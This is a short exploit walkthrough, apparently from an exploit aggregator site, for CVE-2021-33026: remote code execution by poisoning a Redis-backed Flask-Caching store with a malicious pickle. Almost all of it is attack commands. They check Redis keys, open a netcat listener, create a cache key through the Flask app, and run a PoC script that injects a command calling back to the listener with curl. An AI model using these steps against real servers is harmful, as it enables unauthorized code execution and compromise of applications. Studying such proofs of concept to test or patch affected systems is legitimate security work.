Share
## https://sploitus.com/exploit?id=FB7F4DA4-34A7-58CD-945D-6210A6F69011
Pickle Serialization Remote Code Execution - Redis Poisoning PoC Exploit

--------------------------------------------------

Check redis server up and running

redis-cli -h 127.0.0.1 -p 6379 ping

redis-cli keys *

redis-cli get [Keyid]

-------------------------

Start listening netcat at port 10001 :

nc -nvlp 10001

-------------------------

Setting environments for Flask Chache

python -m venv venv_flask_cache_<lib_ver>

source venv_flask_cache_<lib_ver>\scripts\activate

pip install -r <requirement.txt>

Setting environments for Flask Chache 2.3.0


Run Flask App and create cache Key : 

flask run

curl --header "Content-Type: application/json" --request POST  --data  {\"key\":\"Cachelib_2.3\"} http://localhost:5000/cache/new

Get the cache key value from Flask App

curl --request GET http://localhost:5000/cache/[key]

Exploiting Flask Cache by poisoning Redis Cache : 

cve-2021-33026_PoC.py --rhost 127.0.0.1 --rport 5000 --cacheType redis --cmd "curl http://localhost:10001" --id 41685a90-434e-4d70-9a08-35b78025e09a